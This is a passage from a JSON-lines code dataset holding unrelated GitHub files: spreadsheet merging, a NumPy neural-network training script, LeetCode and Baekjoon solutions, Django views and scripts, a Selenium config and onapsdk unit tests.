\"widgets\": st.column_config.Column(\n width=\"medium\"\n )\n }\n)\n","repo_name":"streamlit/st-issues","sub_path":"issues/gh-6879/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"23356407829","text":"import os\nfrom openpyxl import load_workbook, Workbook\nfrom openpyxl.utils import get_column_letter\n\n\ntweets = load_workbook(\"/Users/USER/FILE/EXCEL_FILE.xlsx\",data_only=True)\ntweetsWS = tweets[\"Sheet1\"]\n\ncheckingSamples = load_workbook(\"/Users/USER/FILE/EXCEL_FILE#2w.xlsx\",data_only=True)\ncheckingSamplesWS = checkingSamples[\"BR\"]\n\nWB = Workbook()\nWS = WB.active\n\n# create 2D lists to hold cell data\nrowtweets = []\nrowSamples = []\n\n# append cell data to lists\nfor row in range(1,58649):\n columnData = []\n for col in range(1,8):\n char = get_column_letter(col)\n columnData.append(tweetsWS[char+str(row)].value)\n rowtweets.append(columnData)\n\nfor row in range(1,148):\n CheckingData = []\n for col in range(1,4):\n char = get_column_letter(col)\n CheckingData.append(checkingSamplesWS[char+str(row)].value)\n rowSamples.append(CheckingData)\n\n# merge data between two files\nfor i in rowtweets:\n for k in rowSamples:\n if str(i[0]) == str(k[2]):\n i[5] = k[0]\n\n\n# print the new cell data into excel file\nfor b in range(0,len(rowtweets),1):\n WS.append(rowtweets[b])\nWB.save(\"Vinies Tweets.xlsx\")\n","repo_name":"xanderrp2/RandomPractice","sub_path":"Lab_merger_crude.py","file_name":"Lab_merger_crude.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73830166247","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Modelo para o Sensor CEI\n# \n# Este dataset **\"DataCEI.csv\"** possui informações dispostas em colunas sobre as características dos objetos que passam pelo sensor:\n# \n# * **Tamanho**: Segue a classificação do CEI2020 (Tamanho='0' - Grande 100%).\n# * **Referencia**: Referência dinâmica do *Threshold.\n# * **NumAmostra**: Número de amostras adquiridas.\n# * **Area**: Somatório das Amplitudes das amostras.\n# * **Delta**: Máxima Amplitude da amostra.\n# * **Output1**: Peça tipo 1.\n# * **Output2**: Peça tipo 2.\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n#get_ipython().run_line_magic('matplotlib', 'inline')\n\n#Função do cáculo da sigmóide\ndef sigmoid(x):\n return 1/(1+np.exp(-x))\n\n\n# Carregando os dados\n# Vamos começar lendo o arquivo DataCEI.csv em um dataframe do pandas.\nDataSet=pd.read_csv('arruela_.csv')\nDataSet.head()\nDataSet.drop(['Hora','Tamanho','Referencia'],axis=1,inplace=True)\nDataSet.head()\nDataSet.describe()\n\n# ### Váriaveis do *Dataset*\n\nDataSet.columns\n# ### Número de Peças\n# \n# #### Vamos classificar os grupos pelo número de peças: \n# 1. Grupo com uma peça\n# 2. 
Grupo com duas peças\nsns.set_style('whitegrid')\nsns.countplot(x='Output2',data=DataSet,palette='RdBu_r')\nplt.show()\n\n# #### Gráfico da distribuição das áreas das peças\n\nsns.distplot(DataSet['Area'].dropna(),kde=False,color='darkred',bins=30)\nplt.show()\n\nsns.set_style('whitegrid')\nsns.countplot(x='Area',hue='Output2',data=DataSet,palette='rainbow')\nplt.show()\n\nsns.set_style('whitegrid')\nsns.countplot(x='NumAmostra',hue='Output2',data=DataSet,palette='rainbow')\nplt.show()\n\n\nsns.set_style('whitegrid')\nsns.countplot(x='Delta',hue='Output1',data=DataSet,palette='rainbow')\nplt.show()\n\n# ## As variáveis preditoras e a variável de resposta\n# \n# Para treinar o modelo de regressão, primeiro precisaremos dividir nossos dados em uma matriz **X** que contenha os dados das variáveis preditoras e uma matriz **y** com os dados da variável de destino.\n# \n# ### Matrizes X e y\n\n#X = DataSet[[ 'NumAmostra', 'Area', 'Delta']]\n#y = DataSet[['Output1','Output2']]\n\n# ### Relação entre as variáveis preditoras\n# \n# #### Algumas questões importantes\n# 1. Pelo menos um dos preditores ***x1, x2, ... ,x5*** é útil na previsão da resposta?\n# 2. Todos os preditores ajudam a explicar **y**, ou apenas um subconjunto dos preditores?\n# 3. Quão bem o modelo se ajusta aos dados?\n# 4. Dado um conjunto de valores de previsão, quais valores de resposta devemos prever e quais as métricas indicam um bom modelo de previsão?\n# \n# **Gráficos simples de dispersão**\n# \n# Pelos gráficos abaixo percebemos ... nossa variável de resposta\nsns.pairplot(DataSet)\nplt.show()\n\n\n# **Mapa de Calor**\n# \n# O gráfico abaixo mostra através de uma escala de cores a correlação entre as variáveis do *Dataset*. Se observarmos as cores deste gráfico, a variável preditora **'Area'** possui maior correlação com a variável de resposta **'Output'** e a variável **'NumAmostra'** a menor.\n\nsns.heatmap(DataSet.corr())\nplt.show()\n\n\n# ## Normalização dos Dados\n\nfrom sklearn.preprocessing import StandardScaler\nscaler=StandardScaler()\nDataScaled=scaler.fit_transform(DataSet)\nDataSetScaled=pd.DataFrame(np.array(DataScaled),columns = ['NumAmostra', 'Area', 'Delta', 'Output1','Output2'])\n\nDataSetScaled.head()\n\nX = DataSetScaled.drop(['Output1', 'Output2'],axis=1)\ny = DataSet[['Output1','Output2']]\n\n\n# ## Separando os dados de treinamento e de validação\n# \n# Agora vamos dividir os dados em um conjunto de treinamento e um conjunto de testes. Vamos treinar o modelo no conjunto de treinamento, em seguida, usar o conjunto de teste para validar o modelo.\n# \n# Em nosso exemplo iremos separar de forma randômica 33% dos dados para validação. Estes dados não serão utilizados para determinação dos coeficientes preditores do modelo. 
\n# \n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.29, random_state=3)\n\nprint(y_test)\nprint(X_test)\n# ## Criando o Modelo de MPL\n\n\n#Tamanho do DataSet de Treinamento\nn_records, n_features = X_train.shape\n\n#Arquitetura da MPL\nN_input = 3\nN_hidden = 8\nN_output = 2\nlearnrate = 0.1\n# ## Inicialização dos pesos da MPL (Aleatório)\n\n#Pesos da Camada Oculta (Inicialização Aleatória)\nweights_input_hidden = np.random.normal(0, scale=0.1, size=(N_input, N_hidden))\nprint('Pesos da Camada Oculta:')\nprint(weights_input_hidden)\n\n#Pesos da Camada de Saída (Inicialização Aleatória)\nweights_hidden_output = np.random.normal(0, scale=0.1, size=(N_hidden, N_output))\nprint('Pesos da Camada de Saída:')\nprint(weights_hidden_output)\n\n\n# ## Algoritmo Backpropagation\n\nepochs = 50000\nlast_loss=None\nEvolucaoError=[]\nIndiceError=[]\n\nfor e in range(epochs):\n delta_w_i_h = np.zeros(weights_input_hidden.shape)\n delta_w_h_o = np.zeros(weights_hidden_output.shape)\n for xi, yi in zip(X_train.values, y_train.values):\n \n# Forward Pass\n #Camada oculta\n #Calcule a combinação linear de entradas e pesos sinápticos\n hidden_layer_input = np.dot(xi, weights_input_hidden)\n #Aplicado a função de ativação\n hidden_layer_output = sigmoid(hidden_layer_input)\n \n #Camada de Saída\n #Calcule a combinação linear de entradas e pesos sinápticos\n output_layer_in = np.dot(hidden_layer_output, weights_hidden_output)\n\n #Aplicado a função de ativação \n output = sigmoid(output_layer_in)\n #print('As saídas da rede são',output)\n#------------------------------------------- \n \n# Backward Pass\n ## TODO: Cálculo do Erro\n error = yi - output\n \n # TODO: Calcule o termo de erro de saída (Gradiente da Camada de Saída)\n output_error_term = error * output * (1 - output)\n\n # TODO: Calcule a contribuição da camada oculta para o erro\n hidden_error = np.dot(weights_hidden_output,output_error_term)\n \n # TODO: Calcule o termo de erro da camada oculta (Gradiente da Camada Oculta)\n hidden_error_term = hidden_error * hidden_layer_output * (1 - hidden_layer_output)\n \n # TODO: Calcule a variação do peso da camada de saída\n delta_w_h_o += output_error_term*hidden_layer_output[:, None]\n\n # TODO: Calcule a variação do peso da camada oculta\n delta_w_i_h += hidden_error_term * xi[:, None]\n \n #Atualização dos pesos na época em questão\n weights_input_hidden += learnrate * delta_w_i_h / n_records\n weights_hidden_output += learnrate * delta_w_h_o / n_records\n \n \n # Imprimir o erro quadrático médio no conjunto de treinamento\n \n if e % (epochs / 20) == 0:\n hidden_output = sigmoid(np.dot(xi, weights_input_hidden))\n out = sigmoid(np.dot(hidden_output,\n weights_hidden_output))\n loss = np.mean((out - yi) ** 2)\n\n if last_loss and last_loss < loss:\n print(\"Erro quadrático no treinamento: \", loss, \" Atenção: O erro está aumentando\")\n else:\n print(\"Erro quadrático no treinamento: \", loss)\n last_loss = loss\n \n EvolucaoError.append(loss)\n IndiceError.append(e)\n\n### Gráfico da Evolução do Erro\n\n\nplt.plot(IndiceError, EvolucaoError, 'r') # 'r' is the color red\nplt.xlabel('')\nplt.ylabel('Erro Quadrático')\nplt.title('Evolução do Erro no treinamento da MPL')\nplt.show()\n\n\n# ## Validação do modelo\n\n# Calcule a precisão dos dados de teste\nn_records, n_features = X_test.shape\npredictions=0\n\nfor xi, yi in zip(X_test.values, y_test.values):\n\n# Forward Pass\n #Camada oculta\n #Calcule a combinação linear de 
entradas e pesos sinápticos\n hidden_layer_input = np.dot(xi, weights_input_hidden)\n #Aplicado a função de ativação\n hidden_layer_output = sigmoid(hidden_layer_input)\n \n #Camada de Saída\n #Calcule a combinação linear de entradas e pesos sinápticos\n output_layer_in = np.dot(hidden_layer_output, weights_hidden_output)\n\n #Aplicado a função de ativação \n output = sigmoid(output_layer_in)\n\n#------------------------------------------- \n \n#Cálculo do Erro da Predição\n ## TODO: Cálculo do Erro \n if (output[0]>output[1]):\n if (yi[0]>yi[1]):\n predictions+=1\n \n if (output[1]>=output[0]):\n if (yi[1]>yi[0]):\n predictions+=1\n\nprint(\"A Acurácia da Predição é de: {:.3f}\".format(predictions/n_records))\n ","repo_name":"darlanSchmitz25/IA","sub_path":"0.921.py","file_name":"0.921.py","file_ext":"py","file_size_in_byte":8664,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72070837287","text":"# 给你一个只包含 '(' 和 ')' 的字符串,找出最长有效(格式正确且连续)括号子串的长度。 \n# \n# \n# \n# \n# \n# 示例 1: \n# \n# \n# 输入:s = \"(()\"\n# 输出:2\n# 解释:最长有效括号子串是 \"()\"\n# \n# \n# 示例 2: \n# \n# \n# 输入:s = \")()())\"\n# 输出:4\n# 解释:最长有效括号子串是 \"()()\"\n# \n# \n# 示例 3: \n# \n# \n# 输入:s = \"\"\n# 输出:0\n# \n# \n# \n# \n# 提示: \n# \n# \n# 0 <= s.length <= 3 * 10⁴ \n# s[i] 为 '(' 或 ')' \n# \n# \n# \n# 👍 1785 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def longestValidParentheses(self, s: str) -> int:\n \"\"\"\n 方法1:动态规划\n 思路:最值问题,思考用动态规划去解决。\n 定义dp:dp[i]表示以下标i结尾的最长有效子串长度。\n base case:\n 分析:when s[i] is '(', s[i] not in subs, so dp[i] = 0\n when s[i] is ')', should look s[i-1]:\n if s[i-1] is '(', then dp[i] = dp[i-2] + 2\n if s[i-1] is ')', if s[i-dp[i-1]-1] is '(', then dp[i] = dp[i-1] + 2 + dp[i-dp[i-1]-2]\n \"\"\"\n if not s:\n return 0\n n = len(s)\n dp = [0 for _ in range(n)]\n\n for i in range(1, n):\n if s[i] == ')':\n if s[i-1] == '(':\n dp[i] = dp[i-2] + 2 if i > 1 else 2\n elif s[i-1] == ')':\n if i-dp[i-1] > 0 and s[i-dp[i-1]-1] == '(':\n if i - dp[i-1] >= 2:\n dp[i] = dp[i-1] + 2 + dp[i-dp[i-1]-2]\n else:\n dp[i] = dp[i-1] + 2\n\n return max(dp)\n# leetcode submit region end(Prohibit modification and deletion)\n\n\nif __name__ == '__main__':\n # s = \"(()\"\n s = \")()())\"\n result = Solution().longestValidParentheses(s)\n print(result)\n","repo_name":"zh805/algorithm","sub_path":"leetcode/python/leetcode/editor/cn/[32]最长有效括号.py","file_name":"[32]最长有效括号.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41117560602","text":"\n# reading data\nsource = open('source.txt', 'r')\n\n# writing data\noutput = open('output.txt', 'w')\n\n\ndef fibonacci_sequence(source, output):\n # getting data from source\n source_data = source.read().splitlines()\n source.close()\n\n # getting line indexes from source\n line_indexes = [source_data.index(i) + 1 for i in source_data]\n first_element = second_element = line_indexes[0]\n counter_value = 2\n\n sequence_elements = [first_element]\n\n for i in range(line_indexes[0], line_indexes[6]):\n # code for fibonacci sequence\n while counter_value < line_indexes.index(i) + 1:\n\n elements_sum = first_element + second_element\n first_element = second_element\n second_element = elements_sum\n counter_value += 1\n # adding fibonacci sequence to list\n sequence_elements.append(elements_sum)\n\n # checking for right index between sequence_elements and source_data\n for i in 
source_data:\n\n for element in sequence_elements:\n\n if source_data.index(i) == element-1:\n # reverse and writing data in output.txt\n output.write(i[::-1] + '\\n')\n\n output.close()\n\n return 'Data loaded successfully!'\n\n\nprint(fibonacci_sequence(source, output))\n","repo_name":"MrFlava/justforfun","sub_path":"Sparkybit_test_task-master/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35748549151","text":"'''\nhttps://boj.kr/20057\n'''\nimport sys\ninput = sys.stdin.readline\n\nN = int(input())\nleft = [(-1,-1,0.1),(1,-1,0.1),(-1,0,0.07),(1,0,0.07),(-1,1,0.01),(1,1,0.01),(0,-2,0.05),(-2,0,0.02),(2,0,0.02),(0,-1,0)]\nright = [(y,-x,z) for y,x,z in left]\ndown = [(-x,y,z) for y,x,z in left]\nup = [(x,y,z) for y,x,z in left]\n\ngrid = []\nfor _ in range(N):\n row = list(map(int,input().split()))\n grid.append(row)\n\ndef solve(cnt,dy,dx,tornado_dr):\n global res, curr_y, curr_x\n\n for _ in range(cnt):\n curr_y += dy\n curr_x += dx\n total = 0\n for _dy,_dx,ratio in tornado_dr:\n ny = curr_y + _dy\n nx = curr_x + _dx\n if ratio == 0:\n new_sand = grid[curr_y][curr_x] - total\n else:\n new_sand = int(grid[curr_y][curr_x] * ratio)\n total += new_sand\n if 0 <= ny < N and 0 <= nx < N:\n grid[ny][nx] += new_sand\n else:\n res += new_sand\n\ncurr_y,curr_x = N//2,N//2\nres = 0\nfor i in range(1,N+1):\n if i == N:\n solve(i-1,0,-1,left)\n break\n if i % 2 != 0:\n solve(i,0,-1,left)\n solve(i,1,0,down)\n else:\n solve(i,0,1,right)\n solve(i,-1,0,up)\n\nprint(res)","repo_name":"jihoonyou/problem-solving-2","sub_path":"boj/samsung/20057_마법사 상어와 토네이도.py","file_name":"20057_마법사 상어와 토네이도.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8843900932","text":"#! 
/usr/bin/env python\n\nimport uvmf_gen\n\n## The input to this call is the name of the desired interface\nintf = uvmf_gen.InterfaceClass('jkl')\n\n## Specify the clock and reset signal for the interface\nintf.clock = 'pjClk'\nintf.reset = 'pjRst'\n\n## Specify the ports associated with this interface.\n## addPort(,,[input|output|inout])\nintf.addPort('jkl_wdata',8,'input')\nintf.addPort('jkl_addr',16,'input')\nintf.addPort('jkl_rdata',8,'output')\n\n## Specify transaction variables for the interface.\n## addTransVar(,)\n## optionally can specify if this variable may be specified as 'rand'\nintf.addTransVar('jkl_trnVar1','byte',isrand=False)\nintf.addTransVar('jkl_trnVar2','int',isrand=True)\nintf.addTransVar('jkl_trnVar3','bit [15:0]',isrand=False)\n\n## Specify configuration variables for the interface.\n## addConfigVar(,)\n## optionally can specify if this variable may be specified as 'rand'\nintf.addConfigVar('jkl_cfgVar1','bit',isrand=False)\nintf.addConfigVar('jkl_cfgVar2','int',isrand=True)\nintf.addConfigVar('jkl_cfgVar3','bit [3:0]',isrand=False)\n\n## Set to 'True' if you want this interface code to be Veloce ready,\n## otherwise don't set or set to 'False'\nintf.veloceReady = True\n\n## This will prompt the creation of all interface files in their specified\n## locations\nintf.create()\n","repo_name":"muneeb-mbytes/UVMF","sub_path":"UVM_Framework/UVMF_3.6c/templates/python/examples/multi_file/jkl_if_config.py","file_name":"jkl_if_config.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"30003403170","text":"import os\nimport re\nimport sys\nimport django\nfrom datetime import datetime\nimport ffmpeg\n\n# Set up Django's settings\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ArgusAPI.settings')\ndjango.setup()\n\nfrom API.models import Video\nfrom ArgusAPI.settings import STORAGE_ROOT\n\ndef VideoMeta():\n folder_path = STORAGE_ROOT+\"/files\"\n for file_name in os.listdir(folder_path):\n if file_name.endswith(\".mp4\") or file_name.endswith(\".mov\") or file_name.endswith(\".avi\") or file_name.endswith(\".mkv\"):\n file_path = os.path.join(folder_path, file_name)\n\n # Retrieve video thumbnail\n thumbnail_path = f\"{file_name}.jpg\"\n # thumbnail_path = os.path.join(folder_path, thumbnail_filename)\n # ffmpeg.input(file_path).output(thumbnail_path, vframes=1).run()\n \n # video info\n probe = ffmpeg.probe(file_path)\n video_stream = next((stream for stream in probe['streams'] if stream['codec_type'] == 'video'), None)\n audio_stream = next((stream for stream in probe['streams'] if stream['codec_type'] == 'audio'), None)\n file_size = os.path.getsize(file_path)\n file_type = video_stream.get(\"codec_name\")\n date_created = os.path.getctime(file_path)\n date_modified = os.path.getmtime(file_path)\n duration = video_stream.get(\"duration\")\n width = video_stream.get(\"width\")\n height = video_stream.get(\"height\")\n frame_rate = video_stream.get(\"avg_frame_rate\")\n audio_codec = audio_stream.get(\"codec_name\")\n audio_channels = audio_stream.get(\"channels\")\n audio_sample_rate = audio_stream.get(\"sample_rate\")\n \n video = Video(\n video_name = file_name,\n thumbnail_path = thumbnail_path,\n video_path = file_path,\n video_type = file_type,\n video_size = file_size,\n video_date_time = date_created,\n duration = duration,\n width = width,\n height = height,\n fps = frame_rate,\n 
audio_codec = audio_codec,\n audio_channel = audio_channels,\n audio_sample_rate = audio_sample_rate\n )\n # print\n # print(\"File name:\", file_name)\n # print(\"File type:\", file_type)\n # print(\"File size:\", file_size, \"bytes\")\n # print(\"Date created:\", datetime.fromtimestamp(date_created).strftime('%Y-%m-%d %H:%M:%S'))\n # print(\"Date last modified:\", datetime.fromtimestamp(date_modified).strftime('%Y-%m-%d %H:%M:%S'))\n # print(\"Duration:\", duration, \"seconds\")\n # print(\"Resolution:\", width, \"x\", height)\n # print(\"Frame rate:\", frame_rate, \"fps\")\n # print(\"Audio codec:\", audio_codec)\n # print(\"Audio channels:\", audio_channels)\n # print(\"Audio sample rate:\", audio_sample_rate, \"Hz\")\n # print(\"-----------------------------------\")\n","repo_name":"Team-Zeon/cyberx","sub_path":"ArgusAPI/API/scripts/videometadata.py","file_name":"videometadata.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10158576463","text":"from math import sqrt \n\n\n# Fonction qui permet de determiner un rectangle dans un polygone \ndef rec(A):\n AB=sqrt((A[2]-A[0])**2+(A[3]-A[1])**2)\n AD=sqrt((A[6]-A[0])**2+(A[7]-A[1])**2)\n BC=sqrt((A[4]-A[2])**2+(A[5]-A[3])**2)\n DC=sqrt((A[4]-A[6])**2+(A[5]-A[7])**2)\n VAB=A[2]-A[0],A[3]-A[1]\n VAD=A[6]-A[0],A[7]-A[1]\n VEC=VAB[0]*VAD[0]+VAB[1]*VAD[1]\n \n if (((AB==DC) or (AD==BC) and (VEC==0))):\n return {\"Rectangle\":True}\n\n else:\n return {\"Rectangle\":False}\n\nprint(rec(A=[1,2,3,2,1,1,3,1]))\n\n","repo_name":"Manoe2006/ann-e-sco-2022-2023","sub_path":"devoir_maison_nsi.py/func_rectangle.py","file_name":"func_rectangle.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12402770833","text":"from logging import WARNING, INFO, DEBUG\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\n\n# Set the logging level.\nlogging_level = DEBUG\n\n# Configure the Chrome settings.\nuser_data_dir = r\"C:\\works\\_tools\\selenium\\chrome\\User Data\"\nprofile_dir = r\"Default\"\ndownload_dir = r\"C:\\works\\_tools\\selenium\\chrome\\Downloads\"\n\n# Define the sequences of Ausrine.\nsequences = [\n {\"get\": {\"url\": \"https://www.google.com/?hl=en\"}},\n {\"click\": {\"by\": By.XPATH, \"value\": \"//textarea[@title='Search']\"}},\n {\"send_keys\": {\"by\": By.XPATH, \"value\": \"//textarea[@title='Search']\", \"text\": \"iphone\"}},\n {\"send_keys\": {\"by\": By.XPATH, \"value\": \"//textarea[@title='Search']\", \"text\": \" 14\", \"append\": True}},\n {\"send_keys\": {\"by\": By.XPATH, \"value\": \"//textarea[@title='Search']\", \"text\": Keys.ENTER}},\n]\n","repo_name":"naoyoshinori/ausrine_example","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72616264808","text":"from django.shortcuts import render, redirect\nfrom django.template.loader import render_to_string\nfrom django.http import HttpResponse, HttpResponseRedirect\n\n# Create your views here.\nfrom .models import Post\n\n\ndef post_list(request):\n # html = render_to_string('blog/post_list.html')\n # posts = Post.objects.all()\n #\n # result = 'index
    '\n #\n # for post in posts:\n # result += f'-{post}
    '\n    #\n    # # return HttpResponse(result)\n    # return HttpResponse(result)\n    # render는 주어진 1,2 번째 인수를 사용해서\n    # 1번째인수 : HttpRequests 인스턴스\n    # 2번째인수 : 문자열(TEMPLATE['DIRS']를 기준으로 탐색할 템플릿 파일의 경로\n    # return render\n    posts = Post.objects.all().order_by('-id')\n    context = {\n        'posts': posts,\n    }\n    return render(request, 'blog/post_list.html', context)\n\n\ndef post_detail(requset, post_id):\n    post = Post.objects.get(id=post_id)\n    context = {\n        'post': post,\n    }\n\n    # post_detail view function 이 올바르게 동작하는 html을 작성해 오세요\n    # post_detail.html 파일을 만들어서 post.id 값을 할당하여 해당 페이지로 넘겨주기\n    return render(requset, 'blog/post_detail.html', context)\n\n\ndef post_create(request):\n    # title\n    # text\n    # title = Post.objects.create(title=)\n    # text = Post.objects.create(text=)\n    context = {\n\n    }\n    print(request.POST.get('title'))\n    print(request.POST.get('content'))\n    if request.method == 'POST':\n        # request의 method 값이 'POST' 일 경우\n        # request.POST에 있는 title, text 값과\n        # request.user 에 있는 User 인스턴스 속성을 사용해서\n        # 세 post 인스턴스를 생성\n        # HttpResponse를 사용해 새로생성된 인스턴스의 id, title, text 정보를 출력\n        post = Post.objects.create(\n            author=request.user,\n            title=request.POST['title'],\n            text=request.POST['content'],\n\n        )\n        # HTTP Redirection을 보낼 URL\n        # http://localhost:8000/\n        return redirect('post-list')\n    else:\n        return render(request, 'blog/post_create.html', context)\n\n\ndef post_delete(request, post_id):\n    if request.method == 'POST':\n        post = Post.objects.get(id=post_id)\n        post.delete()\n    return redirect('post-list')\n\n\ndef post_edit(request, post_id):\n    post = Post.objects.get(id=post_id)\n\n    if request.method == 'POST':\n        pass\n        # 글을 수정하기\n        # 1. 수정할 내용(title, text)을 가져온다\n        # 2. 수정할 Post 인스턴스 명시\n        # 3. 해당하는 Post 인스턴스의 title, text 를 수정해서 DB에 저장\n        # 4. post_detail로 이동\n        title = request.POST['title']\n        text = request.POST['content']\n\n        # 수정해서 DB에 저장\n        post.title = title\n        post.text = text\n        post.save()\n        # return HttpResponseRedirect('/{}/'.format(post_id))\n        # post-detail에 해당하는 URL 을 만들어 내려면,\n        # (\\d+)에 해당하는 부분을 채울 값이 함께 필요\n        return redirect('post-detail', post_id)\n    # POST 방식이라면 어차피 위에서 return 되므로ㅓ else문 생략\n    context = {\n        'post':post,\n    }\n    return render(request, 'blog/post_edit.html', context)\n","repo_name":"bear-engineer/Python-django-tutorial","sub_path":"app/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"16535934417","text":"from unittest import mock\n\nfrom onapsdk.aai.cloud_infrastructure import Complex\nfrom onapsdk.aai.cloud_infrastructure import CloudRegion\n\n\nCOMPLEXES = {\n    \"complex\":[\n        {\n            \"physical-location-id\":\"integration_test_complex\",\n            \"data-center-code\":\"1234\",\n            \"complex-name\":\"integration_test_complex\",\n            \"identity-url\":\"\",\n            \"resource-version\":\"1588244056133\",\n            \"physical-location-type\":\"\",\n            \"street1\":\"\",\n            \"street2\":\"\",\n            \"city\":\"\",\n            \"state\":\"\",\n            \"postal-code\":\"\",\n            \"country\":\"\",\n            \"region\":\"\",\n            \"latitude\":\"\",\n            \"longitude\":\"\",\n            \"elevation\":\"\",\n            \"lata\":\"\",\n            \"time-zone\":\"\",\n            \"data-owner\":\"\",\n            \"data-source\":\"\",\n            \"data-source-version\":\"\"\n        }\n    ]\n}\n\n\nCOMPLEXES_COUNT = {\n    \"results\":[\n        {\n            \"complex\":12\n        }\n    ]\n}\n\n\n@mock.patch.object(Complex, \"send_message\")\ndef test_complex(mock_send_message):\n    cmplx = Complex(name=\"test_complex_name\",\n                    physical_location_id=\"test_location_id\",\n                    resource_version=\"1234\")\n    assert cmplx.name == 
\"test_complex_name\"\n assert cmplx.physical_location_id == \"test_location_id\"\n assert cmplx.url == (f\"{Complex.base_url}{Complex.api_version}/cloud-infrastructure/\"\n \"complexes/complex/test_location_id\")\n\n cmplx2 = Complex.create(name=\"test_complex_name\",\n physical_location_id=\"test_location_id\")\n mock_send_message.assert_called_once()\n assert cmplx2.name == \"test_complex_name\"\n assert cmplx2.physical_location_id == \"test_location_id\"\n assert cmplx2.url == (f\"{Complex.base_url}{Complex.api_version}/cloud-infrastructure/\"\n \"complexes/complex/test_location_id\")\n method, _, url = mock_send_message.call_args[0]\n assert method == \"PUT\"\n assert url == (f\"{Complex.base_url}{Complex.api_version}/cloud-infrastructure/\"\n \"complexes/complex/test_location_id\")\n\n@mock.patch.object(Complex, \"send_message\")\ndef test_complex_update(mock_send_message):\n cmplx1 = Complex.update(name=\"test_complex_name\",\n physical_location_id=\"test_location_id\")\n mock_send_message.assert_called_once()\n assert cmplx1.name == \"test_complex_name\"\n assert cmplx1.physical_location_id == \"test_location_id\"\n assert cmplx1.url == (f\"{Complex.base_url}{Complex.api_version}/cloud-infrastructure/\"\n \"complexes/complex/test_location_id\")\n method, _, url = mock_send_message.call_args[0]\n assert method == \"PATCH\"\n assert url == (f\"{Complex.base_url}{Complex.api_version}/cloud-infrastructure/\"\n \"complexes/complex/test_location_id\")\n\n\n@mock.patch.object(Complex, \"send_message_json\")\ndef test_complex_get_all(mock_send_message_json):\n mock_send_message_json.return_value = COMPLEXES\n complexes = list(Complex.get_all())\n assert len(complexes) == 1\n cmplx = complexes[0]\n assert cmplx.name == \"integration_test_complex\"\n assert cmplx.physical_location_id == \"integration_test_complex\"\n\n\n@mock.patch.object(CloudRegion, \"add_relationship\")\n@mock.patch.object(CloudRegion, \"relationships\", new_callable=mock.PropertyMock)\n@mock.patch.object(CloudRegion, \"delete_relationship\")\ndef test_cloud_region_link_to_complex(mock_delete_relationship, mock_relationships, mock_add_rel):\n \"\"\"Test Cloud Region linking with Complex.\n\n Test Relationship object creation\n \"\"\"\n cloud_region = CloudRegion(cloud_owner=\"test_cloud_owner\",\n cloud_region_id=\"test_cloud_region\",\n orchestration_disabled=True,\n in_maint=False)\n cmplx = Complex(name=\"test_complex_name\",\n physical_location_id=\"test_location_id\",\n resource_version=\"1234\")\n cloud_region.link_to_complex(cmplx)\n mock_add_rel.assert_called_once()\n relationship = mock_add_rel.call_args[0][0]\n assert relationship.related_to == \"complex\"\n assert relationship.related_link == (f\"https://aai.api.sparky.simpledemo.onap.org:30233/aai/\"\n f\"v27/cloud-infrastructure/complexes/complex\"\n f\"/test_location_id\")\n assert len(relationship.relationship_data) == 1\n\n mock_relationships.return_value = [relationship]\n cloud_region.unlink_complex(cmplx)\n mock_delete_relationship.assert_called_once_with(relationship)\n\n\n@mock.patch.object(Complex, \"send_message_json\")\ndef test_complex_get_by_physical_location_id(mock_send_message_json):\n \"\"\"Test complex get_by_physical_location_id url creation.\"\"\"\n Complex.get_by_physical_location_id(\"test\")\n mock_send_message_json.assert_called_once_with(\n \"GET\",\n \"Get complex with physical location id: test\",\n f\"{Complex.base_url}{Complex.api_version}/cloud-infrastructure/\"\n f\"complexes/complex/test\"\n )\n\n@mock.patch.object(Complex, 
